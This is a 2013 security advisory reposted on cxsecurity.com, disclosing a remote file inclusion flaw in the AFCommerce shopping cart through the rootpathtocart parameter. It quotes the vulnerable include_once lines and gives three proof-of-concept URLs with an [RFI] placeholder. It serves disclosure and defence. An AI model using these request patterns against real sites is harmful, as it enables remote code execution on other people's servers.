AFCommerce Remote File Inclusion

2013.12.26
Credit: NoGe
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

[o] AFCommerce a.k.a Amazing Flash Commerce <= Remote File Inclusion Vulnerability Software : AFCommerce Professional Edition Version : n/a Vendor : http://www.afcommerce.com/ Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Desc : AFCommerce is a full and complete online store with both a store front and administration area directly Out-Of-The-Box, which can be easily installed, configured, and maintained over a web-based interface. AFCommerce now includes our Ecommerce Website Building Software integrated with our free shopping cart. This allows you to create an unlimited number of custom web pages, customize font / colors of all your pages, as well as, the structural layout of your website. ============================================================================================================= [o] Vuln adblock.php adminpassword.php controlheader.php include_once ($rootpathtocart . "/admin/customadminfooter.php"); include_once ($rootpathtocart . "/mods/adminfiles/adminpassword.php"); include_once ($rootpathtocart . "/mods/adminfiles/controlheader.php"); ============================================================================================================= [o] Poc http://localhost/afcontrol/adblock.php?rootpathtocart=[RFI] http://localhost/afcontrol/adminpassword.php?rootpathtocart=[RFI] http://localhost/afcontrol/controlheader.php?rootpathtocart=[RFI] ============================================================================================================= [o] Greetz Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory aJe kaka11 matthews wishnusakti inc0mp13te martfella pizzyroot Genex H312Y noname tukulesto }^-^{ ============================================================================================================= [o] December 25 2013 - Papua, Indonesia || Selamat Natal!! Tuhan Yesus Berkati... :)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top